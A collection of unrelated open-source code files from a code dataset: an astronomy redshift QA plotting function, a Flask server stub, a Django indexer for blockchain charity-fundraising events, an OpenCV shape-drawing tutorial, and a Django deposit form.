\"\"\"\n #import matplotlib.pyplot as plt\n log = get_logger()\n\n if axis is None:\n axis = plt.gca()\n\n x_bins = np.linspace(x_lo, x_hi, num_slices + 1)\n x_i = np.digitize(x, x_bins) - 1\n limits = []\n counts = []\n for s in range(num_slices):\n # Calculate percentile statistics for ok fits.\n y_slice = y[ok & (x_i == s)]\n counts.append(len(y_slice))\n if counts[-1] > 0:\n limits.append(np.percentile(y_slice, (2.5, 16, 50, 84, 97.5)))\n else:\n limits.append((0., 0., 0., 0., 0.))\n limits = np.array(limits)\n counts = np.array(counts)\n\n # Plot scatter of all fits.\n axis.scatter(x[ok], y[ok], s=15, marker='.', lw=0, color='b', alpha=0.5)\n axis.scatter(x[~ok], y[~ok], s=15, marker='x', lw=0, color='k', alpha=0.5)\n\n # Plot quantiles in slices with enough fits.\n stepify = lambda y: np.vstack([y, y]).transpose().flatten()\n y_m2 = stepify(limits[:, 0])\n y_m1 = stepify(limits[:, 1])\n y_med = stepify(limits[:, 2])\n y_p1 = stepify(limits[:, 3])\n y_p2 = stepify(limits[:, 4])\n xstack = stepify(x_bins)[1:-1]\n for i in range(num_slices):\n s = slice(2 * i, 2 * i + 2)\n if counts[i] >= min_count:\n axis.fill_between(\n xstack[s], y_m2[s], y_p2[s], alpha=0.15, color='red')\n axis.fill_between(\n xstack[s], y_m1[s], y_p1[s], alpha=0.25, color='red')\n axis.plot(xstack[s], y_med[s], 'r-', lw=2.)\n\n # Plot cut lines.\n axis.axhline(+y_cut, ls=':', color='k')\n axis.axhline(0., ls='-', color='k')\n axis.axhline(-y_cut, ls=':', color='k')\n\n # Plot histograms of of not ok and catastrophic fits.\n rhs = axis.twinx()\n\n weights = np.ones_like(x[bad]) / len(x[ok])\n if len(weights) > 0:\n try:\n rhs.hist(\n x[bad], range=(x_lo, x_hi), bins=num_slices, histtype='step',\n weights=weights, color='k', cumulative=True)\n except UnboundLocalError:\n log.warning('All values lie outside the plot range')\n\n weights = np.ones_like(x[~ok]) / len(x)\n if len(weights) > 0:\n try:\n rhs.hist(\n x[~ok], range=(x_lo, x_hi), bins=num_slices, histtype='step',\n weights=weights, color='k', ls='dashed', cumulative=True)\n except UnboundLocalError:\n log.warning('All values lie outside the plot range')\n\n axis.set_ylim(-1.25 * y_cut, +1.25 * y_cut)\n axis.set_xlim(x_lo, x_hi)\n\n return axis, rhs\n\n\ndef dz_summ(simz_tab, outfile=None, pdict=None, min_count=20):\n \"\"\"Generate a summary figure comparing zfind to ztruth.\n\n Parameters\n ----------\n simz_tab : Table\n Table of redshift information.\n pp : PdfPages object\n This parameter is not documented.\n pdict : dict\n Guides the plotting parameters\n min_count : int, optional\n This parameter is not documented.\n \"\"\"\n log = get_logger()\n\n # INIT\n nrows = 2\n objtype = ['ELG', 
'LRG', 'QSO_T', 'QSO_L']\n fluxes = ['OIIFLUX','ZMAG','GMAG','GMAG']\n ncols = len(objtype)\n #title = r'$\\Delta v$ vs. z'\n\n # Plotting dicts\n if pdict is None:\n pdict = dict(ELG={'TRUEZ': { 'n': 15, 'min': 0.6, 'max': 1.6, 'label': 'redshift', 'overlap': 1 },\n 'RMAG': {'n': 12, 'min': 21.0, 'max': 23.4, 'label': 'r-band magnitude', 'overlap': 0},\n 'OIIFLUX': {'n': 10, 'min': 0.0, 'max': 5.0e-16, 'label': '[OII] flux', 'overlap': 2}},\n LRG={'TRUEZ': {'n': 12, 'min': 0.5, 'max': 1.0, 'label': 'redshift', 'overlap': 2 },\n 'ZMAG': {'n': 15, 'min': 19.0, 'max': 21.0, 'label': 'z-band magnitude', 'overlap': 1 }},\n QSO_T={'TRUEZ': {'n': 12, 'min': 0.5, 'max': 2.1, 'label': 'redshift', 'overlap': 1 },\n 'GMAG': {'n': 15, 'min': 19.0, 'max': 24.0, 'label': 'g-band magnitude', 'overlap': 1 }},\n QSO_L={'TRUEZ': {'n': 12, 'min': 2.1, 'max': 4.0, 'label': 'redshift', 'overlap': 1 },\n 'GMAG': {'n': 15, 'min': 19.0, 'max': 24.0, 'label': 'g-band magnitude', 'overlap': 1 }},\n )\n\n # Initialize a new page of plots.\n plt.clf()\n figure, axes = plt.subplots(\n nrows, ncols, figsize=(11, 8.5), facecolor='white',\n sharey=True)\n #figure.suptitle(title)\n\n # True Redshift\n row = 0\n ptype = 'TRUEZ'\n for row in range(nrows):\n for i,otype in enumerate(objtype):\n if row == 0:\n ptype = 'TRUEZ'\n else:\n ptype = fluxes[i]\n\n # Grab the set of measurements\n survey = slice_simz(simz_tab, objtype=otype, redm=True, survey=True)\n\n # Simple stats\n ok = survey['ZWARN'] == 0\n dv = calc_dz(survey)*3e5 # dz/1+z\n bad = dv > catastrophic_dv(otype)\n #if i==2:\n # pdb.set_trace()\n\n # Plot the truth distribution for this variable.\n if ptype == 'TRUEZ':\n x = survey['TRUEZ']\n elif ptype == 'OIIFLUX':\n x = survey['OIIFLUX']\n else:\n log.warning('Assuming hardcoded filter order')\n if ptype == 'GMAG':\n x = survey['MAG'][:,0]\n elif ptype == 'RMAG':\n x = survey['MAG'][:,1]\n elif ptype == 'ZMAG':\n x = survey['MAG'][:,2]\n else:\n raise ValueError('unknown ptype {}'.format(ptype))\n\n nslice, x_min, x_max = pdict[otype][ptype]['n'], pdict[otype][ptype]['min'], pdict[otype][ptype]['max']\n rhs = None\n max_dv = 1000.\n max_frac = 0.1\n overlap = pdict[otype][ptype]['overlap']\n\n # axis\n col = i\n axis = axes[row][col]\n\n #if (row==1) & (col==1):\n #pdb.set_trace()\n\n if len(survey) < 100:\n log.warning(\"Insufficient objects of type {:s}. 
Skipping slice QA\".format(otype))\n continue\n lhs, rhs = plot_slices(\n x=x, y=dv, ok=ok, bad=bad, x_lo=x_min, x_hi=x_max,\n num_slices=nslice, y_cut=max_dv, axis=axis, min_count=min_count)\n # Add a label even if the fitter has no results.\n xy = (0.5, 0.98)\n coords = 'axes fraction'\n axis.annotate(\n otype, xy=xy, xytext=xy, xycoords=coords,\n textcoords=coords, horizontalalignment='center',\n verticalalignment='top', size='large', weight='bold')\n\n rhs.set_ylim(0., max_frac)\n if col < ncols - 1:\n plt.setp([rhs.get_yticklabels()], visible=False)\n else:\n # Hide the last y-axis label except on the first row.\n if row > 0:\n plt.setp([rhs.get_yticklabels()[-2:]], visible=False)\n rhs.set_ylabel('zwarn, catastrophic cumulative fraction')\n\n if col > 0:\n plt.setp([axis.get_yticklabels()], visible=False)\n else:\n axis.set_ylabel('Redshift fit residual $\\Delta v$ [km/s]')\n\n #if row < nrows - 1:\n # plt.setp([axis.get_xticklabels()], visible=False)\n #else:\n axis.set_xlabel('{0} {1}'.format(otype, ptype))\n axis.set_xlim(x_min, x_max)\n\n # Hide overlapping x-axis labels except in the bottom right.\n if overlap and (col < ncols - 1):\n axis.set_xticks(axis.get_xticks()[0:-overlap])\n\n figure.subplots_adjust(\n left=0.1, bottom=0.07, right=0.9, top=0.95,\n hspace=0.2, wspace=0.05)\n\n if outfile is not None:\n plt.savefig(outfile, dpi=700)\n plt.close()\n","repo_name":"michaelJwilson/LBGCMB","sub_path":"desihub/desisim/py/desisim/spec_qa/redshifts.py","file_name":"redshifts.py","file_ext":"py","file_size_in_byte":31041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
{"seq_id":"34782900661","text":"from flask_restful import Resource, Api\nfrom flask_jsonpify import jsonify, jsonpify\nfrom flask_cors import CORS\nfrom flask import Flask, request\nimport json\n\n########### CONFIG ###########\nhost = '127.0.0.1'\nport = '12345'\ndebug = True\ndata_path = '../data/'\nsend_on_exception = True\nshow_request_args = True  # echo parsed request arguments to stdout\n\n# flask setup\napp = Flask(__name__)\napi = Api(app)\nCORS(app)\n\n\n@app.route('/', methods=('get', 'post'))\ndef rest():\n # parse JSON args\n try:\n args = json.loads(request.args['args'])\n if show_request_args:\n print('\\nRequest arguments:')\n print(json.dumps(args, sort_keys=False, indent=4))\n\n action = args['action']\n\n return jsonify({\n 'type': 'error',\n 'msg': 'Missing arguments or invalid action!'\n })\n\n except Exception as e:\n print(e)\n if send_on_exception:\n return jsonify({\n 'type': 'error',\n 'msg': str(e.args[0])\n })\n else:\n raise\n\n\n# start server when program starts\nif __name__ == '__main__':\n print(f'Server is running at http://{host}:{port}/\\n')\n if not debug:\n print(\n 'Debug mode is disabled, server will not detect changes in code.')\n app.run(host=host, port=port, debug=debug)\n","repo_name":"visvar/rhythm-vis","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"26666889","text":"from web3 import Web3\nfrom web3.middleware import geth_poa_middleware\nfrom contract_parser.models import *\nfrom user_profile.models import *\nfrom .models import *\nfrom django.utils import timezone\nfrom .contract_enums import *\nfrom decimal import Decimal\nimport datetime\n\n\ndef handle_applied_as_validator_event():\n contract_obj = Contract.objects.get(contract_name=\"Validator\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = 
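# --- Editor's note: the rhythm-vis server above reads a JSON-encoded `args`
# query parameter and dispatches on its 'action' key. A minimal client call,
# assuming the server is running with the CONFIG shown; 'ping' is a made-up
# action, and as written the server answers every action with the error payload:
import json, requests
resp = requests.get('http://127.0.0.1:12345/',
                    params={'args': json.dumps({'action': 'ping'})})
print(resp.json())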
contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n applied_as_validator_events = contract.events.AppliedAsValidator().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in applied_as_validator_events:\n\n applicant_address = event['args']['applicant']\n ipfs_hash = event['args']['_ipfsHash']\n committee_id = event['args']['committeeId']\n status = event['args']['status']\n\n # Fetch or create the user profile\n user_profile, _ = UserProfile.objects.get_or_create(wallet_address=applicant_address)\n\n # Create or update the validator request\n ValidatorRequest.objects.update_or_create(\n applicant=user_profile,\n defaults={\n 'ipfs_hash': ipfs_hash,\n 'validation_status': status,\n 'committee_id': committee_id\n }\n )\n\n\ndef handle_validator_request_responded_event():\n contract_obj = Contract.objects.get(contract_name=\"Validator\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n validator_request_responded_events = contract.events.ValidatorRequestResponded().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in validator_request_responded_events:\n applicant_address = event['args']['applicant']\n status = event['args']['status']\n\n # Fetch the user profile\n user_profile = UserProfile.objects.get(wallet_address=applicant_address)\n\n # Update the validator request status\n validator_request = ValidatorRequest.objects.get(applicant=user_profile)\n validator_request.validation_status = status\n validator_request.save()\n\n\ndef handle_final_decision_event():\n contract_obj = Contract.objects.get(contract_name=\"RandomizedCommittee\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n final_decision_events = contract.events.FinalDecision().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n print(f\"Final Decision logs: {final_decision_events}\")\n for event in final_decision_events:\n committee_id = event['args']['committeeId']\n decision = event['args']['finalDecision']\n\n committee_instance = Committee.objects.get(committee_id=committee_id)\n committee_instance.final_decision = decision\n\n committee_instance.save()\n\n\ndef handle_decision_recorded_event():\n contract_obj = Contract.objects.get(contract_name=\"RandomizedCommittee\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n decision_recorded_events = contract.events.DecisionRecorded().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in decision_recorded_events:\n committee_id = 
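# --- Editor's note: every handler in this indexer repeats the same setup block
# (fetch the Contract row, build a POA-patched Web3, instantiate the contract).
# A refactoring sketch, not present in the original, that would remove the
# duplication:
def get_web3_contract(contract_name):
    contract_obj = Contract.objects.get(contract_name=contract_name)
    web3 = Web3(Web3.HTTPProvider(contract_obj.network.rpc_endpoint))
    web3.middleware_onion.inject(geth_poa_middleware, layer=0)
    contract = web3.eth.contract(address=contract_obj.address, abi=contract_obj.abi)
    return contract_obj, web3, contract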
event['args']['committeeId']\n member = event['args']['member']\n decision = event['args']['decision']\n feedback = event['args']['feedback']\n\n member_profile, _ = UserProfile.objects.get_or_create(wallet_address=member)\n committee_instance = Committee.objects.get(committee_id=committee_id)\n\n committee_membership = CommitteeMembership.objects.get(committee=committee_instance, member=member_profile)\n\n if not committee_membership.has_voted:\n committee_membership.has_voted = True\n committee_membership.decision = decision\n committee_membership.feedback = feedback\n committee_membership.save()\n\n if decision:\n committee_instance.yes_votes += 1\n else:\n committee_instance.no_votes += 1\n committee_instance.save()\n\n\ndef handle_chosen_as_committee_member():\n contract_obj = Contract.objects.get(contract_name=\"RandomizedCommittee\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n chosen_member_events = contract.events.ChosenAsCommitteeMember().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in chosen_member_events:\n committee_id = event['args']['newCommitteeId']\n committee_type_id = event['args']['_committeeTypeId']\n milestone_index = event['args']['_milestoneIndex']\n committee_type = CommitteeType(\n event['args']['_committeeType']).name # Assuming CommitteeType is an Enum in your Django code\n member_address = event['args']['member']\n\n # Fetch the committee instance\n committee_instance, _ = Committee.objects.get_or_create(committee_id=committee_id)\n\n # Logic to add/update each member's detailed information\n user_profile, _ = UserProfile.objects.get_or_create(wallet_address=member_address)\n committee_member, _ = CommitteeMembership.objects.get_or_create(member=user_profile, committee=committee_instance)\n committee_member.committee_type = committee_type\n committee_member.committee_type_id = committee_type_id\n committee_member.milestone_index = milestone_index\n committee_member.save()\n\n # Add the member to the committee if not already added\n if committee_member not in committee_instance.members.all():\n committee_instance.members.add(committee_member.member)\n\n # Update the last processed block\n contract_obj.save()\n\n\ndef handle_committee_formed():\n contract_obj = Contract.objects.get(contract_name=\"RandomizedCommittee\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n committee_formed_events = contract.events.CommitteeFormed().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in committee_formed_events:\n committee_id = event['args']['committeeId']\n members = event['args']['members']\n committee_type_id = event['args']['_committeeTypeId']\n milestone_index = event['args']['_milestoneIndex']\n committee_type = CommitteeType(\n event['args']['_committeeType']).name\n\n committee_instance, created = Committee.objects.get_or_create(\n committee_id=committee_id,\n defaults={\n 'final_decision': None, # or set a default if needed\n 
'total_members': len(members),\n 'committee_type': committee_type,\n 'committee_type_id': committee_type_id,\n 'milestone_index': milestone_index\n }\n )\n\n if created:\n # Assuming you have a related model for members (e.g., CommitteeMember)\n for member_address in members:\n user_profile, _ = UserProfile.objects.get_or_create(wallet_address=member_address)\n committee_member, _ = CommitteeMembership.objects.get_or_create(member=user_profile, committee=committee_instance)\n committee_instance.members.add(user_profile)\n\n committee_instance.save()\n\n contract_obj.save()\n\n\ndef update_proposal_status():\n contract_obj = Contract.objects.get(contract_name=\"CharityEvent\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n # Fetch the ProposalStatusUpdated events\n proposal_status_updated_events = contract.events.ProposalStatusUpdated().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in proposal_status_updated_events:\n event_id = event['args']['eventId']\n status = EventMilestoneStatus(event['args']['status']).name # Convert to string representation\n\n # Update the event in the database\n try:\n charity_event = Event.objects.get(id=event_id)\n charity_event.status = status\n charity_event.save()\n\n except Event.DoesNotExist:\n print(\"Event don't exist: \", event_id)\n pass\n\n\ndef convert_timestamp_to_datetime(endDate):\n # If the timestamp is larger than a certain threshold (e.g., year 3000 in seconds),\n # assume it's in milliseconds and divide by 1000\n if endDate > 32503680000:\n endDate /= 1000\n return timezone.datetime.fromtimestamp(endDate, tz=timezone.utc)\n\n\ndef get_proposals():\n contract_obj = Contract.objects.get(contract_name=\"CharityEvent\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n propasal_creation_event = contract.events.ProposalCreated().get_logs(fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in propasal_creation_event:\n event_id = event['args']['eventId']\n creator = event['args']['creator']\n event_name = event['args']['name']\n event_description = event['args']['description']\n target_amount = Decimal(event['args']['targetAmount'])\n collected_amount = Decimal(event['args']['collectedAmount'])\n endDate = event['args']['endDate']\n category = event['args']['category']\n committeeId = event['args']['committeeId']\n isFundraisingOver = event['args']['isFundraisingOver']\n block_number = event['blockNumber']\n timestamp = web3.eth.get_block(block_number)[\"timestamp\"]\n tokenUri = contract.functions.tokenURI(event_id).call()\n\n # Now Save it\n user_profile, _ = UserProfile.objects.get_or_create(wallet_address=creator)\n\n created_at = timezone.datetime.fromtimestamp(timestamp, tz=timezone.utc)\n event_date = convert_timestamp_to_datetime(endDate)\n print(f\"End Date Datetime: {event_date}\")\n try:\n event_instance, created = Event.objects.get_or_create(\n id=event_id,\n defaults={\n 'creator': user_profile,\n 'name': event_name,\n 'description': event_description,\n 'target_amount': target_amount,\n 
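# --- Editor's note: `convert_timestamp_to_datetime` above disambiguates
# second- vs millisecond-resolution timestamps with a cutoff of 32503680000
# (roughly the year 3000 in seconds). A quick check that both branches agree
# on the same instant:
assert (convert_timestamp_to_datetime(1700000000000)      # milliseconds
        == convert_timestamp_to_datetime(1700000000))     # seconds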
'collected_amount': collected_amount,\n 'end_date': event_date,\n 'created_at': created_at,\n 'category': EventCategory(category).name,\n 'status': EventMilestoneStatus(0).name,\n 'rating_sum': 0,\n 'rating_count': 0,\n 'committee_id': committeeId,\n 'is_fundraising_over': isFundraisingOver,\n 'token_uri': tokenUri\n }\n )\n event_instance.save()\n\n except Exception as e:\n print(f\"EXCEPTION: {e}\")\n\n\ndef update_milestone_data():\n contract_obj = Contract.objects.get(contract_name=\"CharityEvent\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n # Fetch the MilestoneMarkedAsCompleted events\n milestone_completed_events = contract.events.MilestoneMarkedAsCompleted().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in milestone_completed_events:\n event_id = event['args']['eventId']\n milestone_index = event['args']['milestoneIndex']\n spended_amount = Decimal(event['args']['spendedAmount'])\n\n # Update the milestone in the database\n try:\n charity_event = Event.objects.get(id=event_id)\n milestone = Milestone.objects.get(event=charity_event, milestone_index=milestone_index)\n milestone.spended_amount = spended_amount\n milestone.completed = True\n milestone.save()\n\n except (Event.DoesNotExist, IndexError):\n print(f\"Event with ID {event_id} doesn't exist or milestone index {milestone_index} is out of range.\")\n pass\n\n\ndef update_milestone_status():\n contract_obj = Contract.objects.get(contract_name=\"CharityEvent\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n # Fetch the MilestoneStatusUpdated events\n milestone_status_updated_events = contract.events.MilestoneStatusUpdated().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in milestone_status_updated_events:\n event_id = event['args']['eventId']\n milestone_index = event['args']['milestoneIndex']\n decision = event['args']['decision']\n is_completed = event['args']['_iscomplited']\n\n # Determine the status based on the decision and is_completed values\n if is_completed:\n status = EventMilestoneStatus.Approved.name if decision else EventMilestoneStatus.Rejected.name\n else:\n status = EventMilestoneStatus.Pending.name\n\n # Update the milestone in the database\n try:\n charity_event = Event.objects.get(id=event_id)\n milestone = Milestone.objects.get(event=charity_event, milestone_index=milestone_index)\n milestone.status = status\n milestone.completed = is_completed\n milestone.save()\n\n except (Event.DoesNotExist, IndexError):\n print(f\"Event with ID {event_id} doesn't exist or milestone index {milestone_index} is out of range.\")\n pass\n\n\ndef get_milestones():\n contract_obj = Contract.objects.get(contract_name=\"CharityEvent\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n milestone_creation_event = 
contract.events.MilestoneCreated().get_logs(fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in milestone_creation_event:\n event_id = event['args']['eventId']\n milestone_index = event['args']['milestoneIndex']\n milestone_name = event['args']['milestoneName']\n description = event['args']['description']\n target_amount = Decimal(event['args']['targetAmount'])\n endDate = event['args']['endDate']\n status = EventMilestoneStatus(event['args']['status']).name\n block_number = event['blockNumber']\n timestamp = web3.eth.get_block(block_number)[\"timestamp\"]\n\n # Convert the timestamp to a Django datetime object\n end_date = convert_timestamp_to_datetime(endDate)\n created_at = timezone.datetime.fromtimestamp(timestamp, tz=timezone.utc)\n\n # Fetch the associated event and creator\n try:\n associated_event = Event.objects.get(id=event_id)\n creator_profile = UserProfile.objects.get(wallet_address=associated_event.creator.wallet_address)\n except (Event.DoesNotExist, UserProfile.DoesNotExist):\n # Handle the case where the associated event or user does not exist in the database\n # This might be an error or you might want to create a new event or user\n continue\n\n # Save the milestone to the database\n milestone_instance, _ = Milestone.objects.get_or_create(\n event=associated_event,\n name=milestone_name,\n milestone_index=milestone_index,\n defaults={\n 'creator': creator_profile,\n 'description': description,\n 'spended_amount': 0, # Assuming the spended amount starts at 0\n 'target_amount': target_amount,\n 'end_date': end_date,\n 'created_at': created_at,\n 'rating_sum': 0,\n 'rating_count': 0,\n 'committee_id': 0, # Assuming no committee is assigned initially\n 'completed': False,\n 'is_fund_released': False,\n 'status': status\n }\n )\n\n contract_obj.save()\n\n\ndef handle_donated_to_event_event():\n contract_obj = Contract.objects.get(contract_name=\"Fundraising\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n donated_to_event_events = contract.events.DonatedToEvent().get_logs(\n fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in donated_to_event_events:\n try:\n donor_address = event['args']['donor']\n amount = Decimal(event['args']['amount'])\n event_id = event['args']['eventId']\n message = event['args']['message']\n block_number = event['blockNumber']\n timestamp = web3.eth.get_block(block_number)[\"timestamp\"]\n event_instance = Event.objects.get(id=event_id)\n donor_profile, created = UserProfile.objects.get_or_create(wallet_address=donor_address)\n Donation.objects.create(\n donor=donor_profile,\n amount=Decimal(amount),\n event=event_instance,\n timestamp=datetime.datetime.fromtimestamp(timestamp),\n message=message\n )\n # Updating the collected_amount of the related Event\n event_instance.collected_amount += Decimal(amount)\n event_instance.save()\n\n except Exception as e:\n print(e)\n\ndef handle_fund_released_to_creator_event():\n contract_obj = Contract.objects.get(contract_name=\"Fundraising\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, 
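# --- Editor's note: the donation amounts above are stored as the raw uint256
# from the event -- wei-denominated if the contract moves the native token,
# which is an assumption, not confirmed by this code. Decimal preserves the
# full integer precision but does not change units; for display, web3.py ships
# a converter (from_wei in web3 v6+, fromWei in v5), e.g.:
# ether_amount = Web3.from_wei(int(amount), 'ether')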
abi=abi)\n\n fund_released_to_creator_events = contract.events.FundReleasedToCreator().get_logs(\n fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in fund_released_to_creator_events:\n event_id = event['args']['eventId']\n amount = Decimal(event['args']['creatorShare'])\n creator_address = event['args']['creator']\n\n event_instance = Event.objects.get(id=event_id)\n creator_profile = UserProfile.objects.get(wallet_address=creator_address)\n\n FundRelease.objects.create(\n event=event_instance,\n amount=amount,\n release_type='Creator',\n recipient=creator_profile\n )\n\n\ndef handle_fund_released_to_validators_event():\n contract_obj = Contract.objects.get(contract_name=\"Fundraising\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n fund_released_to_validators = contract.events.FundReleasedToValidators().get_logs(\n fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in fund_released_to_validators:\n event_id = event['args']['eventId']\n amount = Decimal(event['args']['validatorShare'])\n validator_address = event['args']['validator']\n\n validator_profile = UserProfile.objects.get(wallet_address=validator_address)\n event_instance = Event.objects.get(id=event_id)\n FundRelease.objects.create(\n event=event_instance,\n amount=amount,\n release_type='Validator',\n recipient=validator_profile\n )\n\n\ndef handle_fund_released_to_platform_event():\n contract_obj = Contract.objects.get(contract_name=\"Fundraising\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n fund_released_to_platform_events = contract.events.FundReleasedToPlatform().get_logs(\n fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in fund_released_to_platform_events:\n event_id = event['args']['eventId']\n amount = Decimal(event['args']['platformShare'])\n platform_address = event['args']['platform']\n\n platform_profile = UserProfile.objects.get(wallet_address=platform_address)\n event_instance = Event.objects.get(id=event_id)\n FundRelease.objects.create(\n event=event_instance,\n amount=amount,\n release_type='Platform',\n recipient=platform_profile\n )\n","repo_name":"cultchain-com/backend","sub_path":"indexer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":23386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39816417987","text":"import cv2\nimport numpy as np\n\nimg = np.zeros((512, 512, 3), np.uint8)\n# print(img.shape)\n# img[:] = 255,0,0\n\n# =================\n# SHAPES ON IMAGES\n# =================\n\n# The 1st arg is the image, 2nd is the Starting Point, 3rd is the Ending Point, 4th is the Color, & 5th is the\n# Thickness\ncv2.line(img, (0,0), (img.shape[1], img.shape[0]), (0, 255, 0), 3)\ncv2.rectangle(img, (0,0), (250, 350), (0, 0, 255), 2)\ncv2.circle(img, (400, 50), 30, (255, 255, 0), 5)\n\n# ==============\n# TEXT ON SHAPES\n# ==============\n\n# The 1st arg is the image, 2nd is the text, 3rd is the Starting Point, 4th is the Font Style, 5th is the Scale,\n# 6th is 
the Color, 7th is the Thickness\ncv2.putText(img, \" OPENCV \", (300, 200), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 150, 0), 3)\n\ncv2.imshow(\"Image\", img)\ncv2.waitKey(0)","repo_name":"Elemento24/OpenCV-Computer-Vision-Basics","sub_path":"chapter4.py","file_name":"chapter4.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27232347668","text":"\nfrom django.contrib.auth.models import User\nfrom django import forms\nfrom BarApp.models import *\nfrom operator import itemgetter\n\ndef get_users():\n \"\"\"get_users()\n Returns sorted list for all users which are in Saldo table\n :return: _description_\n \"\"\"\n return sorted([(i.id,i.username) for i in User.objects.filter(id__in=Saldo.objects.values_list('user_id'))],key=itemgetter(1))\n\nclass AddMoney(forms.Form):\n \"\"\"Add Money to saldo\n Form which allows users to deposit money.\n :param forms: _description_\n \"\"\"\n amount = forms.DecimalField(label=\"Hoeveel geld wil je storten:\",max_digits=5, decimal_places=2)\n user = forms.ModelChoiceField(label=\"Bij wie moet dit op de rekening:\",queryset=User.objects.filter(id__in=Saldo.objects.values_list('user_id',flat=True)).order_by(\"username\"))\n 